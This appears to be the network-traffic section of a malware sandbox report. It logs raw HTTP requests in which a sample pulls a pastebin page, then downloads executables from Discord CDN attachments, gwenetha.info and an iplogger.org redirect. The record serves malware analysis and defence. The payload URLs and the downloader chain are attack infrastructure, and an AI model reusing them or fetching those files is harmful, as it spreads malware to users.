Network Analysis

GET /raw/gCyjHCCH HTTP/1.1 Host: pastebin.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Tue, 06 Apr 2021 08:11:14 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=dd5fa6d56acf59db1cfff713e8319313d1617696674; expires=Thu, 06-May-21 08:11:14 GMT; path=/; domain=.pastebin.com; HttpOnly; SameSite=Lax; Secure x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 1644 cf-request-id: 0947d569c80000a21f0a001000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Server: cloudflare CF-RAY: 63b98b560c34a21f-ICN

GET /attachments/826198252025675816/826538114838298715/install_setupVPSfree.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive

HTTP/1.1 403 Forbidden Date: Tue, 06 Apr 2021 08:11:32 GMT Content-Type: application/xml; charset=UTF-8 Content-Length: 223 Connection: keep-alive Set-Cookie: __cfduid=df4ba8a9ad35a4f0e57bf8f386a38e9041617696691; expires=Thu, 06-May-21 08:11:31 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax CF-Ray: 63b98bc4a924a1cb-ICN Cache-Control: private, max-age=0 Expires: Tue, 06 Apr 2021 08:11:32 GMT Vary: Accept-Encoding CF-Cache-Status: EXPIRED Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 cf-request-id: 0947d5aeee0000a1cbc415e000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" X-GUploader-UploadID: ABg5-Uw7u1ezGB1aSfB5XbHjRpQyxEGCud5JCLKhjeWUaol-SlCwicRw5YGT0BjV1H8D2vJ8rSRIzeg502fPoj2J6_ZBWQFmKA X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=dQul2%2FEi1Iq%2FrITiLl5ur5UH9kqqsy8M1PKWRnsj8kPvHwSCTRo13%2B9dbq1IwhLBslwv7Cap6GRsOTwC7fdcHgJEo3ZJsd2PRaS8lzgqSa8cZBY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare

GET /setup-KGQJ-1.exe HTTP/1.1 Host: gwenetha.info Connection: Keep-Alive

HTTP/1.1 404 Not Found Date: Tue, 06 Apr 2021 08:11:32 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 19 Connection: keep-alive Set-Cookie: __cfduid=d7f09de2a53b0f82c0b7042741c9b536f1617696692; expires=Thu, 06-May-21 08:11:32 GMT; path=/; domain=.gwenetha.info; HttpOnly; SameSite=Lax X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC cf-request-id: 0947d5b06a0000368ce9176000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=0EGHB6M%2Fgxz3Knu4AETi85O8FjoWbvdSCinaI7aYsts2I%2BKS8dPvB5bKCWH326XUU7M79M1tTrSd5eX%2FZf2wcyYJqpiw5I66spqNNIme"}],"max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 63b98bc70b33368c-LAX alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400

GET /attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Tue, 06 Apr 2021 08:11:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d8e506c5ff0397cbcc6dfa19792a8b9241617696692; expires=Thu, 06-May-21 08:11:32 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 0947d5b07f000035133f9f7000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=jFTIvx6tNldbz2SbEKLPvs787OSMCURpeeIzJbvEaSMo4vUPr2so0pr4vNvv9vH7WzNbdIfTLa6bFDcsJQTPrFIrVpOa0Z28PjNRanpEmMZNH24%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 63b98bc739bb3513-ICN alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400

GET /attachments/826416818390040589/826469949593485312/file.exe HTTP/1.1 Host: cdn.discordapp.com

HTTP/1.1 403 Forbidden Date: Tue, 06 Apr 2021 08:11:32 GMT Content-Type: application/xml; charset=UTF-8 Content-Length: 223 Connection: keep-alive Set-Cookie: __cfduid=d8e506c5ff0397cbcc6dfa19792a8b9241617696692; expires=Thu, 06-May-21 08:11:32 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax CF-Ray: 63b98bc82c303513-ICN Cache-Control: private, max-age=0 Expires: Tue, 06 Apr 2021 08:11:32 GMT Vary: Accept-Encoding CF-Cache-Status: EXPIRED Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 cf-request-id: 0947d5b119000035138db41000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" X-GUploader-UploadID: ABg5-UwtD5Tln-aOB2mvFXc2pYsCpr1LgTqxBrbknv6gKeOD-dKC8ORRTyw95niOPhvgZEZeGCsAj-tsMFQc3vd2wd2hgLQXYw X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=mS8hFFWVLAds%2BB1SWb2DceZWq2s%2F%2BK4ZcTJB976r3%2FidGXP%2FzDhmW4DBXW8OhiL%2FCk8Ti2lIfcoVWF7jpbNgt%2BeqDC%2FJl9G6rzNA%2BBXsyq%2BWPsY%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare

GET /2LehR6.exe HTTP/1.1 Host: iplogger.org Connection: Keep-Alive

HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 06 Apr 2021 08:11:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=6ks8lps7rg82goiqksmt42v052; path=/; HttpOnly Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache Pragma: no-cache Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=261351489; path=/ Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Location: https://cdn.discordapp.com/attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe Strict-Transport-Security: max-age=31536000; preload X-Frame-Options: DENY

GET /attachments/826416818390040589/826855866228670474/7525b875715555.exe HTTP/1.1 Host: cdn.discordapp.com

HTTP/1.1 403 Forbidden Date: Tue, 06 Apr 2021 08:11:55 GMT Content-Type: application/xml; charset=UTF-8 Content-Length: 223 Connection: keep-alive Set-Cookie: __cfduid=dd4613d7a9626c9c849cdcbdbe58f38e91617696715; expires=Thu, 06-May-21 08:11:55 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax CF-Ray: 63b98c54ddbd352c-ICN Cache-Control: private, max-age=0 Expires: Tue, 06 Apr 2021 08:11:55 GMT Vary: Accept-Encoding CF-Cache-Status: EXPIRED Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 cf-request-id: 0947d609060000352c64912000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" X-GUploader-UploadID: ABg5-Uxis6FvkqPg_kh6_RhRPIgHtaOvR_BN674Wjl6v_Vpowt_8XNTPXul8w91fdo-lH09qzcB3u0KZgciypLxJ0WNHp4iVxA X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=C%2BDLlOgcuBCwlodBR7BKftAE5rykh5Rks15coaf4hwI8ry3Nn0AfEOE2CwRmT5JOZmTEngYaH5RWhQVxJHRku3r6dyuhrw3SQGDbCPevIxNhqoY%3D"}]} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe HTTP/1.1 Host: cdn.discordapp.com

HTTP/1.1 200 OK Date: Tue, 06 Apr 2021 08:12:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d4d269d8c3b186f0ae819659e296f2fb91617696726; expires=Thu, 06-May-21 08:12:06 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 0947d6375a0000a2196685c000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ZF7vIopxOaGM070FQl%2B4c4m7v5KeDxK7N4iK7V%2FI4ePv2Is3cjTMrwfd%2BHsakAlGnUiFZb6F3tGTfkpKEmmOe5KjrNNDrBeRLw3F2aqtoaTeuRU%3D"}]} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 63b98c9effa7a219-ICN alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400

GET /attachments/826416818390040589/826540039764705360/7525b875713675d4ff0018cf084f493a4e4977de_2021-03-30_22-25.exe HTTP/1.1 Host: cdn.discordapp.com

HTTP/1.1 200 OK Date: Tue, 06 Apr 2021 08:12:09 GMT Content-Type: application/x-msdos-program Content-Length: 505856 Connection: keep-alive Set-Cookie: __cfduid=d27438203eac535153d6d89bd44895c711617696729; expires=Thu, 06-May-21 08:12:09 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax CF-Ray: 63b98cb1dce4a219-ICN Accept-Ranges: bytes Age: 551738 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=7525b875713675d4ff0018cf084f493a4e4977de_2021-03-30_22-25.exe ETag: "28345a7bb63babaf99e760965ce493b7" Expires: Wed, 06 Apr 2022 08:12:09 GMT Last-Modified: Tue, 30 Mar 2021 19:35:01 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 cf-request-id: 0947d6432b0000a219483c7000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1617132901889175 x-goog-hash: crc32c=Ws/4nQ== x-goog-hash: md5=KDRae7Y7q6+Z52CWXOSTtw== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 505856 X-GUploader-UploadID: ABg5-UznZNO55X93AubXlWYP0c5SyYOTRHkzDJhcIzrcH58RoyWaPDs0j0jqBmhsS-QvB5VHDoqPplp1xtV5hwkr0kW8h3tVvw X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=HWVOlbz8LgNqX4DasFXcEfgWE6HkqNUcUBM1gleYtHfwo4u2AuzclBM9pZQoKziG4FpJnP5lVOi24WsaXFO5Sq2GGP5duzFdBpqMCKbQO2vFVlE%3D"}]} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare